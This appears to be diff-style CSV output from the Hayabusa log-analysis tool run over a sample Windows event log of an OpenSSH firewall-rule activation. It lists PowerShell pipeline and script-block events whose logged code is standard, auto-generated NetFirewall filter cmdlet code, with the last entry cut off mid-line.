+2021-04-23 19:09:45.076 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.076 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.077 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallSecurityFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.078 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallSecurityFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.110 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.111 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.112 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallPortFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.112 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallPortFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.142 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetServiceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Service}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Service') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Service}) $__cmdletization_queryBuilder.FilterByProperty('ServiceName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByService', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallServiceFilter' -Alias '*' function Set-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallServiceFilter' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.142 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetServiceFilter' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Service}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Service') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Service}) $__cmdletization_queryBuilder.FilterByProperty('ServiceName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleFilterByService', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByQuery', 'ByAssociatedNetFirewallRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetFirewallServiceFilter' -Alias '*' function Set-NetFirewallServiceFilter { [CmdletBinding(DefaultParameterSetName='Query (cdxml)', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] param( [Parameter(ParameterSetName='Query (cdxml)')] [string] ${PolicyStore}, [Parameter(ParameterSetName='Query (cdxml)')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Service}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='Query (cdxml)')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('Query (cdxml)') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('Query (cdxml)', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Service')) { [object]$__cmdletization_value = ${Service} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ServiceName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallServiceFilter.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallServiceFilter' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.142 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.142 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.144 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallServiceFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.145 +09:00,srvdefender01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallServiceFilter"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx
+2021-04-23 19:09:45.177 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, 